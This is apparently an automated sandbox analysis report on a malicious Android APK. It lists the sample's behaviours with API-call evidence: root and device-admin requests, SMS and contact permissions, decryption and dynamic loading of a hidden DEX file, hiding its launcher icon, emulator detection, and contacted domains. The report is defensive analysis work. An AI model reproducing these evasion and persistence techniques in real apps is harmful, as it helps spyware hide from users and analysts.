Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:36
Start time:18:01:54
Joe Sandbox Product:Complete
Start date:21.12.2017
Overall analysis duration:0h 3m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5wd2rZUWEk
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android 5.1
Detection:MAL
Classification:mal88.spyw.expl.evad.and@0/253@2/0
Warnings:
Show All
  • No interacted views
  • Report size exceeded maximum capacity and may have missing dynamic data code.


Detection

StrategyScoreRangeReportingDetection
Threshold880 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: 5wd2rZUWEkvirustotal: Detection: 49%Perma Link

Privilege Escalation:

barindex
Requests root accessShow sources
Source: Lcom/czybg/eqtbdmzpklrgyns/xnLvoQ;->DiXsQ(Landroid/content/Context;)ZMethod string: "/system/bin/su"
Source: Lcom/czybg/eqtbdmzpklrgyns/xnLvoQ;->DiXsQ(Landroid/content/Context;)ZMethod string: "/system/xbin/su"
Source: Lmpio/fabric/sdk/android/services/common/CommonUtils;->isRooted(Landroid/content/Context;)ZMethod string: "/system/xbin/su"
Checks if the device administrator is activeShow sources
Source: com.czybg.eqtbdmzpklrgyns.hekJfDg;->DiXsQ:51API Call: android.app.admin.DevicePolicyManager.isAdminActive
Tries to add a new device administratorShow sources
Source: com.czybg.eqtbdmzpklrgyns.uIcqnrbS;->hZyMGHgz:13API Call: android.content.Intent.<init> android.app.action.ADD_DEVICE_ADMIN
Source: com.czybg.eqtbdmzpklrgyns.uIcqnrbS;->DiXsQ:25API Call: android.content.Intent.<init> android.app.action.ADD_DEVICE_ADMIN
Source: com.czybg.eqtbdmzpklrgyns.uIcqnrbS;->DiXsQ:34API Call: android.content.Intent.<init> android.app.action.ADD_DEVICE_ADMIN

Spreading:

barindex
Accesses external storage locationShow sources
Source: mpio.fabric.sdk.android.services.persistence.FileStoreImpl;->getExternalCacheDir:20API Call: android.os.Environment.getExternalStorageDirectory
Source: mpio.fabric.sdk.android.services.persistence.FileStoreImpl;->getExternalFilesDir:34API Call: android.os.Environment.getExternalStorageDirectory
Source: mpio.fabric.sdk.android.services.persistence.FileStoreImpl;->isExternalStorageAvailable:47API Call: android.os.Environment.getExternalStorageState
Has permission to change the WIFI configuration including connecting and disconnectingShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE

Networking:

barindex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /android/config_update/08312017-sms-blacklist.metadata.txt HTTP/1.1User-Agent: AndroidDownloadManager/5.1.1 (Linux; U; Android 5.1.1; VirtualBox Build/LMY48W)Accept-Encoding: identityConnection: closeHost: www.gstatic.com
Source: global trafficHTTP traffic detected: GET /android/config_update/08312017-sms-blacklist.txt HTTP/1.1User-Agent: AndroidDownloadManager/5.1.1 (Linux; U; Android 5.1.1; VirtualBox Build/LMY48W)Accept-Encoding: identityConnection: closeHost: www.gstatic.com
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.gstatic.com
Urls found in memory or binary dataShow sources
Source: scan_process_activity.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: scan_process_activity.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: cls.dex.dr, androidString found in binary or memory: https://alluorine.info
Source: cls.dex.dr, androidString found in binary or memory: https://api-profit.com
Source: cls.dex.dr, androidString found in binary or memory: https://e.crashlytics.com/spi/v2/events
Source: cls.dex.dr, androidString found in binary or memory: https://fabric.io/sign_up
Source: cls.dex.dr, androidString found in binary or memory: https://mancortz.info
Source: cls.dex.drString found in binary or memory: https://mancortz.infoJhttps://settings.crashlytics.com/spi/v2/platforms/android/apps/%s/settings
Source: cls.dex.dr, androidString found in binary or memory: https://settings.crashlytics.com/spi/v2/platforms/android/apps/%s/settings
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 52263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40742
Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 443
Checks an internet connection is availableShow sources
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->CyGFDR:5API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->LmcGi:13API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->LmcGi:14API Call: android.net.NetworkInfo.isConnected
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->Odjrct:20API Call: android.net.wifi.WifiManager.getConnectionInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->hZyMGHgz:24API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->hZyMGHgz:25API Call: android.net.NetworkInfo.getState
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->hZyMGHgz:29API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->hZyMGHgz:30API Call: android.net.NetworkInfo.getState
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->hZyMGHgz:34API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->xnLvoQ:48API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->canTryConnection:15API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->canTryConnection:16API Call: android.net.NetworkInfo.isConnectedOrConnecting
Opens an internet connectionShow sources
Source: com.czybg.eqtbdmzpklrgyns.MfOxe;->DiXsQ:10API Call: java.net.URL.openConnection (not executed)
Source: com.czybg.eqtbdmzpklrgyns.dclBIK;->DiXsQ:9API Call: java.net.URL.openConnection (not executed)
Source: com.czybg.eqtbdmzpklrgyns.uKHWhZbq;->DiXsQ:9API Call: java.net.URL.openConnection (not executed)
Source: com.czybg.eqtbdmzpklrgyns.wymvtEV;->DiXsQ:9API Call: java.net.URL.openConnection (not executed)
Source: mpio.fabric.sdk.android.services.network.HttpRequest$ConnectionFactory$1;->create:2API Call: java.net.URL.openConnection (not executed)
Source: mpio.fabric.sdk.android.services.network.HttpRequest$ConnectionFactory$1;->create:3API Call: java.net.URL.openConnection (not executed)

E-Banking Fraud:

barindex
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS

Operating System Destruction:

barindex
Lists and deletes files in the same contextShow sources
Source: mpcom.crashlytics.android.core.LogFileManager;->discardOldLogFiles:33API Calls in same method context: File.listFiles,File.delete
Source: mpcom.crashlytics.android.core.Utils;->capFileCount:4API Calls in same method context: File.listFiles,File.delete

Change of System Appearance:

barindex
Acquires a wake lockShow sources
Source: com.czybg.eqtbdmzpklrgyns.qwAiT;-><init>:23API Call: android.os.PowerManager$WakeLock.acquire
Sets a repeating alarmShow sources
Source: com.czybg.eqtbdmzpklrgyns.qwAiT;->DiXsQ:47API Call: android.app.AlarmManager.setRepeating

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal88.spyw.expl.evad.and@0/253@2/0
Reads shares settingsShow sources
Source: com.czybg.eqtbdmzpklrgyns.XpiFj;->DiXsQ:9API Call: "255251":
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->xnLvoQ:93API Call: "kgfhjkhfshafd":
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->hZyMGHgz:89API Call: "ttrgsvwser":
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->DiXsQ:10API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->DiXsQ:26API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->LmcGi:69API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.EZmcnv;->Odjrct:80API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:192API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:202API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.YRqiaNxB;->DiXsQ:28API Call: android.content.SharedPreferences.getBoolean
Source: com.czybg.eqtbdmzpklrgyns.ciatqPxI;->DiXsQ:13API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.ciatqPxI;->Odjrct:44API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:33API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:33API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:56API Call: android.content.SharedPreferences.getString
Source: com.czybg.eqtbdmzpklrgyns.siQFgImL;->DiXsQ:123API Call: android.content.SharedPreferences.getString
Source: mpcom.crashlytics.android.answers.AnswersPreferenceManager;->hasAnalyticsLaunched:8API Call: android.content.SharedPreferences.getBoolean
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoProvider;->getInfoFromPreferences:61API Call: android.content.SharedPreferences.getString
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoProvider;->getInfoFromPreferences:65API Call: android.content.SharedPreferences.getBoolean
Source: mpio.fabric.sdk.android.services.common.IdManager;->createInstallationUUID:38API Call: android.content.SharedPreferences.getString
Source: mpio.fabric.sdk.android.services.common.IdManager;->getAppInstallIdentifier:78API Call: android.content.SharedPreferences.getString
Source: mpio.fabric.sdk.android.services.common.IdManager;->getDeviceUUID:105API Call: android.content.SharedPreferences.getString
Source: mpcom.crashlytics.android.core.CrashlyticsCore;->shouldSendReportsWithoutPrompting:440API Call: android.content.SharedPreferences.getBoolean
Source: mpio.fabric.sdk.android.services.persistence.PreferenceStoreStrategy;->restore:11API Call: android.content.SharedPreferences.getString
Source: mpio.fabric.sdk.android.services.settings.DefaultSettingsController;->getStoredBuildInstanceIdentifier:57API Call: android.content.SharedPreferences.getString
Executes native commandsShow sources
Source: com.czybg.eqtbdmzpklrgyns.xnLvoQ;->DiXsQ:4API Call: java.lang.Runtime.exec
Kills/terminates processesShow sources
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.BMcoejIXiwV;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.HOtny8Tb;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.KdfKw0C;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h9;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.O0qC6jwgEnHh;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.PYViEQnPOshkW8;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.S49U6BODT8;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.Vdptsq.WJY2Ahxkjz;->onStartCommand:8API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.IVPcyiFs;->DiXsQ:34API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.yCJnDqab;->run:26API Call: android.os.Process.killProcess
Source: com.czybg.eqtbdmzpklrgyns.zAKRpGn;->run:13API Call: android.os.Process.killProcess
Source: etxtfvw.cqwwrwk;->attachBaseContext:363API Call: android.os.Process.killProcess
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE

Data Obfuscation:

barindex
Uses reflectionShow sources
Source: etxtfvw.cqwwrwk;->YRkFJMV:26API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: etxtfvw.cqwwrwk;->YRkFJMV:26API Call: Real call: public android.content.res.AssetManager android.content.ContextWrapper.getAssets()
Source: etxtfvw.cqwwrwk;->YRkFJMV:29API Call: Real call: android.content.res.AssetManager@b801830
Source: etxtfvw.cqwwrwk;->YRkFJMV:29API Call: Real call: public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:34API Call: Real call: android.content.res.AssetManager$AssetInputStream@29c881cf
Source: etxtfvw.cqwwrwk;->YRkFJMV:34API Call: Real call: public final int android.content.res.AssetManager$AssetInputStream.available() throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:50API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: etxtfvw.cqwwrwk;->YRkFJMV:50API Call: Real call: public java.io.File android.content.ContextWrapper.getFilesDir()
Source: etxtfvw.cqwwrwk;->YRkFJMV:58API Call: Real call: public static final java.lang.String java.io.File.separator
Source: etxtfvw.cqwwrwk;->YRkFJMV:69API Call: Real call: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
Source: etxtfvw.cqwwrwk;->YRkFJMV:69API Call: Real call: public boolean java.io.File.createNewFile() throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:77API Call: Real call: android.content.res.AssetManager$AssetInputStream@29c881cf
Source: etxtfvw.cqwwrwk;->YRkFJMV:77API Call: Real call: public final int android.content.res.AssetManager$AssetInputStream.read(byte[]) throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:82API Call: Real call: android.content.res.AssetManager$AssetInputStream@29c881cf
Source: etxtfvw.cqwwrwk;->YRkFJMV:82API Call: Real call: public final void android.content.res.AssetManager$AssetInputStream.close() throws java.io.IOException
Source: etxtfvw.cqwwrwk;->CNLldGq:281API Call: Real call: public android.content.pm.PackageManager android.content.ContextWrapper.getPackageManager()
Source: etxtfvw.cqwwrwk;->CNLldGq:294API Call: Real call: public android.content.pm.PackageManager android.content.ContextWrapper.getPackageManager()
Source: etxtfvw.cqwwrwk;->CNLldGq:299API Call: Real call: public java.lang.String android.content.ContextWrapper.getPackageName()
Source: etxtfvw.cqwwrwk;->CNLldGq:307API Call: Real call: android.app.ApplicationPackageManager@18722bc6
Source: etxtfvw.cqwwrwk;->CNLldGq:307API Call: Real call: public android.content.pm.PackageInfo android.app.ApplicationPackageManager.getPackageInfo(java.lang.String,int) throws android.content.pm.PackageManager$NameNotFoundException
Source: etxtfvw.cqwwrwk;->CNLldGq:317API Call: Real call: public [B android.content.pm.Signature.toByteArray()
Source: etxtfvw.cqwwrwk;->CNLldGq:325API Call: Real call: private java.lang.String etxtfvw.cqwwrwk.BROqnOXwFKWnWc(byte[])
Source: etxtfvw.cqwwrwk;->CNLldGq:353API Call: Real call: public static [B android.util.Base64.decode(byte[],int)
Source: etxtfvw.cqwwrwk;->CNLldGq:358API Call: Real call: public [B java.lang.String.getBytes()
Source: etxtfvw.cqwwrwk;->CNLldGq:359API Call: Real call: private static [B etxtfvw.cqwwrwk.oDOixVSpHMour(byte[],byte[])
Source: etxtfvw.cqwwrwk;->YRkFJMV:90API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: etxtfvw.cqwwrwk;->YRkFJMV:90API Call: Real call: public [B etxtfvw.cqwwrwk.CNLldGq(byte[])
Source: etxtfvw.cqwwrwk;->YRkFJMV:168API Call: Real call: public void java.io.OutputStream.write(byte[]) throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:173API Call: Real call: public void java.io.FileOutputStream.close() throws java.io.IOException
Source: etxtfvw.cqwwrwk;->YRkFJMV:185API Call: Real call: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
Source: etxtfvw.cqwwrwk;->YRkFJMV:185API Call: Real call: public java.lang.String java.io.File.getAbsolutePath()
Source: etxtfvw.cqwwrwk;->YRkFJMV:190API Call: Real call: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
Source: etxtfvw.cqwwrwk;->YRkFJMV:190API Call: Real call: public java.io.File java.io.File.getParentFile()
Source: etxtfvw.cqwwrwk;->YRkFJMV:199API Call: Real call: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
Source: etxtfvw.cqwwrwk;->YRkFJMV:199API Call: Real call: public java.io.File java.io.File.getParentFile()
Source: etxtfvw.cqwwrwk;->YRkFJMV:200API Call: Real call: /data/data/com.czybg.eqtbdmzpklrgyns/files
Source: etxtfvw.cqwwrwk;->YRkFJMV:200API Call: Real call: public java.lang.String java.io.File.getParent()
Source: etxtfvw.cqwwrwk;->YRkFJMV:209API Call: Real call: android.content.Context android.content.ContextWrapper.mBase
Source: etxtfvw.cqwwrwk;->YRkFJMV:214API Call: Real call: final android.app.ActivityThread android.app.ContextImpl.mMainThread
Source: etxtfvw.cqwwrwk;->YRkFJMV:219API Call: Real call: final android.util.ArrayMap android.app.ActivityThread.mPackages
Source: etxtfvw.cqwwrwk;->attachBaseContext:368API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: etxtfvw.cqwwrwk;->attachBaseContext:368API Call: Real call: private void etxtfvw.cqwwrwk.YRkFJMV()
Source: pvsaeqhpgq.zvsin;->attachBaseContext:40API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: pvsaeqhpgq.zvsin;->attachBaseContext:40API Call: Real call: public void etxtfvw.cqwwrwk.attachBaseContext(android.content.Context)
Source: etxtfvw.cqwwrwk;->onCreate:401API Call: Real call: public java.lang.ClassLoader android.content.ContextWrapper.getClassLoader()
Source: etxtfvw.cqwwrwk;->onCreate:404API Call: Real call: dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
Source: etxtfvw.cqwwrwk;->onCreate:404API Call: Real call: public java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) throws java.lang.ClassNotFoundException
Source: etxtfvw.cqwwrwk;->onCreate:409API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: etxtfvw.cqwwrwk;->onCreate:409API Call: Real call: public android.content.Context android.content.ContextWrapper.getBaseContext()
Source: etxtfvw.cqwwrwk;->onCreate:410API Call: Real call: null
Source: etxtfvw.cqwwrwk;->onCreate:410API Call: Real call: public static android.app.Application android.app.Instrumentation.newApplication(java.lang.Class,android.content.Context) throws java.lang.InstantiationException,java.lang.IllegalAccessException,java.lang.ClassNotFoundException
Source: etxtfvw.cqwwrwk;->onCreate:411API Call: Real call: public void android.app.Application.onCreate()
Source: pvsaeqhpgq.zvsin;->onCreate:54API Call: Real call: etxtfvw.cqwwrwk@32c17d93
Source: pvsaeqhpgq.zvsin;->onCreate:54API Call: Real call: public void etxtfvw.cqwwrwk.onCreate()
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->hZyMGHgz:60API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.NvHUu;->DiXsQ:39API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.NvHUu;->DiXsQ:41API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:143API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:160API Call: java.lang.reflect.Field.get
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:174API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:179API Call: java.lang.reflect.Field.get
Source: com.czybg.eqtbdmzpklrgyns.WDAcpd;->LmcGi:183API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.bsLhBT;->DiXsQ:6API Call: java.lang.reflect.Method.invoke
Source: com.czybg.eqtbdmzpklrgyns.fQuMyR;->DiXsQ:7API Call: java.lang.reflect.Method.invoke
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoReflectionStrategy;->getAdvertisingId:8API Call: java.lang.reflect.Method.invoke
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoReflectionStrategy;->getInfo:18API Call: java.lang.reflect.Method.invoke
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoReflectionStrategy;->isLimitAdTrackingEnabled:28API Call: java.lang.reflect.Method.invoke
Source: mpio.fabric.sdk.android.services.common.AdvertisingInfoReflectionStrategy;->isGooglePlayServiceAvailable:43API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:132API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:140API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:145API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:150API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:160API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->YRkFJMV:178API Call: java.lang.reflect.Method.invoke
Source: etxtfvw.cqwwrwk;->CNLldGq:306API Call: java.lang.reflect.Field.get
Source: etxtfvw.cqwwrwk;->CNLldGq:312API Call: java.lang.reflect.Field.get
Source: etxtfvw.cqwwrwk;->CNLldGq:352API Call: java.lang.reflect.Field.get
Accesses Class Loader via ReflectionShow sources
Source: etxtfvw.cqwwrwk;->onCreate:401API Call: Reflective call: public java.lang.ClassLoader android.content.ContextWrapper.getClassLoader()
Accesses FileOutputStream via ReflectionShow sources
Source: etxtfvw.cqwwrwk;->YRkFJMV:173API Call: Reflective call: public void java.io.FileOutputStream.close() throws java.io.IOException
Found very long method stringsShow sources
Source: Lpvsaeqhpgq/zvsin;->attachBaseContext(Landroid/content/Context;)VMethod string: FABgc2FnWXlnRc3mFz4+ego6eVBjU71ueXZzRFdjFBkGKgoKNkUBJA0/JnxpTWH+vzRk5JohMTNod3RjWXlvRW9lQXVqzy9iPh00ypOMxMwCHdmWB2mck3a2CzDCKBldwybuakNefqjVFI8VU23ykm4uJzHhYSwXmZjpcJgp9ZYN8oj2/POqFoHIS65lkuKha1vV8c6zLxMJF0wG8y7E4JuWqBnZqMyQk++M8f83MYeD7ob2sbmsLJOEwIEyMwL Length: 7812
Loads new DEX files via dynamic constructorShow sources
Source: etxtfvw.cqwwrwk;->uxONpX:276API Call: Constructor call: public dalvik.system.DexClassLoader(java.lang.String,java.lang.String,java.lang.String,java.lang.ClassLoader)

Persistence and Installation Behavior:

barindex
Creates filesShow sources
Source: mpio.fabric.sdk.android.services.settings.DefaultCachedSettingsIo;->writeCachedSettings:40API Call: java.io.FileWriter.<init>
Launches other applicationsShow sources
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:106API Call: android.content.pm.PackageManager.getLaunchIntentForPackage

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: com.czybg.eqtbdmzpklrgyns.qwAiT;-><init>:22API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Uses Crypto APIsShow sources
Source: etxtfvw.cqwwrwk;->BROqnOXwFKWnWc:4API Call: java.security.MessageDigest.getInstance
Source: etxtfvw.cqwwrwk;->BROqnOXwFKWnWc:5API Call: java.security.MessageDigest.digest
Source: com.czybg.eqtbdmzpklrgyns.DiXsQ;->DiXsQ:9API Call: javax.crypto.KeyGenerator.generateKey
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->DiXsQ:2API Call: java.security.MessageDigest.getInstance
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->DiXsQ:4API Call: java.security.MessageDigest.update
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->DiXsQ:5API Call: java.security.MessageDigest.digest
Source: com.czybg.eqtbdmzpklrgyns.MfOxe;->DiXsQ:68API Call: javax.crypto.Cipher.getInstance
Source: com.czybg.eqtbdmzpklrgyns.MfOxe;->DiXsQ:71API Call: javax.crypto.Cipher.init
Source: com.czybg.eqtbdmzpklrgyns.MfOxe;->DiXsQ:72API Call: javax.crypto.Cipher.doFinal
Source: com.czybg.eqtbdmzpklrgyns.cXdqo;->DiXsQ:20API Call: javax.crypto.Cipher.getInstance
Source: com.czybg.eqtbdmzpklrgyns.cXdqo;->DiXsQ:23API Call: javax.crypto.Cipher.init
Source: com.czybg.eqtbdmzpklrgyns.cXdqo;->DiXsQ:25API Call: javax.crypto.Cipher.doFinal
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:183API Call: java.security.MessageDigest.getInstance
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:185API Call: java.security.MessageDigest.update
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:191API Call: java.security.MessageDigest.digest
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:195API Call: java.security.MessageDigest.getInstance
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:196API Call: java.security.MessageDigest.update
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->hash:197API Call: java.security.MessageDigest.digest
Source: mpio.fabric.sdk.android.services.network.PinningTrustManager;->isValidPin:42API Call: java.security.MessageDigest.getInstance
Source: mpio.fabric.sdk.android.services.network.PinningTrustManager;->isValidPin:45API Call: java.security.MessageDigest.digest
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS
Queries list of running processes/tasksShow sources
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->DiXsQ:19API Call: android.app.ActivityManager.getRunningTasks
Source: com.czybg.eqtbdmzpklrgyns.uIcqnrbS;->DiXsQ:3API Call: android.app.ActivityManager.getRunningTasks
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->getAppProcessInfo:99API Call: android.app.ActivityManager.getRunningAppProcesses
Queries package code path (often used for patching other applications)Show sources
Source: mpio.fabric.sdk.android.Fabric;->getKitsFinderFuture:90API Call: android.content.Context.getPackageCodePath
Removes its application launcher (likely to stay hidden)Show sources
Source: com.czybg.eqtbdmzpklrgyns.DIowQgu;->DiXsQ:70API Call: android.content.pm.PackageManager.setComponentEnabledSetting

Malware Analysis System Evasion:

barindex
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: UMQrTOWqmLFBinary or memory string: B1ZqCk1VLw1mVwI4KVZeCEYTRAdnF0AMDAM1XkwBYSJSDVQTQkQEMUZEDFZfZlgfUyhfNlUEMmsB
Accesses android OS build fieldsShow sources
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:84Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:85Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:88Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:89Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:121Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:122Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:125Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:126Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.UBLcF;->onPostExecute:47Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.UBLcF;->onPostExecute:48Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.UBLcF;->onPostExecute:51Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.UBLcF;->onPostExecute:52Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:44Field Access: android.os.Build.BOARD
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:47Field Access: android.os.Build.BRAND
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:50Field Access: android.os.Build.CPU_ABI
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:53Field Access: android.os.Build.DEVICE
